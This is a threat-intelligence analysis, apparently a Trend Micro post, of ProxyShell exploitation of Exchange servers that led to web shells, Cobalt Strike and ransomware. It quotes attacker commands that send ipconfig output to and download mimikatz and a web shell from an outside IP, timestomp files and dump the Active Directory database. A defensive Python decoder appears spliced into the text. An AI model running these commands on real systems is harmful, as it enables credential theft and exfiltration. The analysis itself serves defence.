11/17/2021 | News release | Distributed by Public on 11/17/2021 07:11
The Trend Micro™ Managed XDR team recently observed a surge in server-side compromises, ProxyShell-related intrusions on Microsoft Exchange in particular, via the Managed XDR service and other incident response engagements. These compromises, which occurred across different sectors in the Middle East, were most often observed in environments running on-premises Microsoft Exchange.
In the engagements where the attacker's objective was realized, we found that the deployment of ransomware was the most common end-goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to favor the use of exploits related to ProxyShell in order to establish initial access to an organization's system, with the possibility of ransomware attacks being launched down the line.
Using intrusion clusters that overlapped in their initial access techniques, we recently found a set of intrusions involved in attacks on the Middle East, which we dissect in this blog entry. All of these intrusions, which share the commonality of exploiting vulnerable ProxyShell servers to gain an initial foothold on the target's network, were rooted in an IIS worker process that was spawning suspicious processes.
Through our observation of the web shell activity on the Trend Micro Vision One Platform and by analyzing the process tree created by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes that are associated with the different attack phases and how they tied in to the threat actor's objective.
We clustered all the observed intrusions together to reveal some tactical and operational similarities between the different ransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions were interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the chain of events (and whether LockFile, Conti, or any other ransomware family currently active in the Middle East threat landscape would be deployed as part of the routine).
In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.
The malicious actor initially tried to start the attack by scanning for dropped web shells, which we assume were dropped earlier via vulnerability exploitation. This part failed, as the server returned a 404 error code for those paths when they were requested.
The Autodiscover service is abused to leak a known user's distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the user's security identifier (SID).
This technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.
The web shell is imported as mail inside the administrator@xxx draft mailbox. It is then exported to c:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and returns 200 codes.
An analysis of the file system timeline confirms this: the puqjc.aspx file was created at the same time as the malicious web connection (2:00 PM UTC).
Upon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors. The scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact varied.
The following subsections go into the specifics of the post-exploitation routines we analyzed in four separate incidents that occurred in August and September 2021. While some of the incidents shared certain behaviors during infection, their post-exploitation routines varied.
In the first incident we handled, we discovered that the web shell employed in the attack uses the exec_code query parameter to execute ASP code. After successfully reaching the command-and-control (C&C) server, it executed commands to gather basic information on the compromised system.
Furthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware.
It then executes a base64-encoded PowerShell script that downloads another obfuscated PowerShell script, which it then executes. This script is part of the Cobalt Strike malware family, which provides backdoor access to infected machines.
We also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the PowerShell Windows event log.
Both servers are running Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).
Our analysis shows that a wget request was sent to a URL on a high-numbered port. Unfortunately, we have no information on what was downloaded, since the URL was already dead by the time of analysis.
"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK
The following commands were executed in order to gather basic system information:
The web shell was then copied and the original entry deleted using the following commands:
The ipconfig command was executed as an argument for a wget request.
The following code shows the PowerShell-encoded (top) and decoded (bottom) commands:
"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA
$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"
"c:\windows\system32\cmd.exe" /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=
Invoke-WebRequest -Uri "http://91.92.136.250:443/mimi.exe" -OutFile "c:\windows\temp\mimi.exe"
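The -enc payloads above are base64 over UTF-16LE, so decoding them takes two lines; the useful part of a triage script is pulling the token out of the command line and tagging what the decoded script does. The following Python is an added example, not code from the original post: it takes the two cmd.exe command lines shown above (the encoded tokens are the ones on this page), decodes them, extracts URLs and tags download, in-memory execution, file-write and POST behaviour. Accepting any prefix of -EncodedCommand (-e, -ec, -enc, ...) mirrors documented PowerShell parameter handling; the indicator list is my own assumption.

```python
import base64
import binascii
import re

# Constructed sample: the two cmd.exe command lines shown above, as a process-creation
# log would record them. The -enc tokens are exactly the ones quoted on this page.
SAMPLE_COMMAND_LINES = [
    r'"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc '
    + "JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA",
    r'"c:\windows\system32\cmd.exe" /c powershell -exec bypass -enc '
    + "SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=",
]

# "-e<letters> <token>": PowerShell accepts any unambiguous prefix of -EncodedCommand,
# so capture the parameter name and check it against the full name afterwards.
_ENC_PARAM = re.compile(r'(?<![\w-])-([eE][A-Za-z]*)\s+([A-Za-z0-9+/=]+)')

# Behaviour tags applied to the decoded script (assumed list, extend as needed).
_INDICATORS = {
    "download_cradle": re.compile(
        r'invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|downloadstring|downloadfile|net\.webclient', re.I),
    "in_memory_exec": re.compile(r'invoke-expression|\biex\b', re.I),
    "writes_to_disk": re.compile(r'-outfile', re.I),
    "posts_data": re.compile(r'-method\s+post|-body\b', re.I),
}
_URL = re.compile(r'https?://[^\s"\']+', re.I)


def decode_encoded_command(token):
    """Decode an -EncodedCommand token (base64 of UTF-16LE text); None if it is not one."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Locate encoded PowerShell in one command line, decode it and tag what it does."""
    result = {"decoded": None, "urls": [], "indicators": []}
    for param, token in _ENC_PARAM.findall(cmdline):
        if not "encodedcommand".startswith(param.lower()):
            continue  # e.g. "-exec bypass" is a different switch
        decoded = decode_encoded_command(token)
        if decoded is None:
            continue
        result["decoded"] = decoded
        result["urls"] = _URL.findall(decoded)
        result["indicators"] = [name for name, rx in _INDICATORS.items() if rx.search(decoded)]
        break
    return result


def triage(command_lines):
    return [analyze_command_line(line) for line in command_lines]


if __name__ == "__main__":
    for finding in triage(SAMPLE_COMMAND_LINES):
        print(finding)
```

The first sample decodes to the ipconfig-and-POST one-liner and the second to the mimi.exe download shown above, so both get a download tag, the first also a POST tag and the second a file-write tag. On real telemetry, feeding the decoded text back through the same function catches nested -enc layers.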
The web shell then downloaded an additional .aspx web shell and altered its timestamps to further disguise it on the system, as seen in the following code:
Invoke-WebRequest -Uri "http://91.92.136.250:443/out.aspx" -OutFile "c:\windows\temp\OutlookCM.aspx"
The web shell was then moved to the OWA directory, and its creation, last-write, and last-access times were copied from an existing file in that directory with the following commands:
$f1=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCM.aspx'); $f2=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx'); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;
After a few minutes, additional DLLs were created; these were later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe.
In relation to this incident, we found the following malicious components and malware were used:
Other web shells
During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.NET page, which is quite unusual since most web shells we find are written in PHP instead. This is similar to the bespoke web shell the KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version on the same system.
The Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote machines and servers in order to drop and execute a new backdoor.
A pass-the-hash attack technique was used to access remote servers and machines, after which a new malware component was dropped in order to create persistence.
The following malware was dropped on the infected machines:
"C:\Windows\system32\cmd[.]exe" /c ntdsutil "activate instance ntds" ifm "create full c:\windows\temp\ntd" quit quit
While mitigation controls such as a host-based or network-based intrusion prevention system (HIPS/NIPS) can be applied to these servers, these controls only buy time until actual patching occurs, giving IT teams the leeway to trigger the appropriate change management controls.
It is also worth noting that a Microsoft Exchange server will still have an active web shell if it is patched only after a successful compromise. This means that servers that have been compromised via ProxyShell-related vulnerabilities should be inspected thoroughly for any malicious activity, since web shells may already exist (and could still be operational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives, such as ransomware infection, cryptocurrency mining, and data exfiltration.
The implementation of proper segmentation for publicly exposed servers should always be reviewed, with their behavior (i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example, the observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be a sign that the server has been compromised. Earlier this year, Microsoft wrote an excellent guide for hardening web servers against web shell-based attacks.
Trend Micro Managed XDR offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing a 24/7 service that allows organizations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro's wealth of global threat intelligence.
Product Name | Detections
Endpoint Security products: Real Time scan, Behavior monitoring |
Endpoint Security: Deep Security IPS |
Network Security: TippingPoint |
Network Security: DDI Deep Discovery Inspector |
Indicators of Compromise
Hashes
SHA256 | Details | Detection Name
428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066 | rundll.bat | HackTool.BAT.WinDefKiller.C
28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8 | CacheTask.dll | Backdoor.Win32.COTX.A
E3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2 | dllhost.exe | PUA.Win64.LanGO.B
27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E | HostDLL.exe | Trojan.Win64.OGNHOST
5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043 | | Trojan.PS1.COBEACON.SMYXAK-A
IPs & URL
Strings (IIS Logs)
Vulnerabilities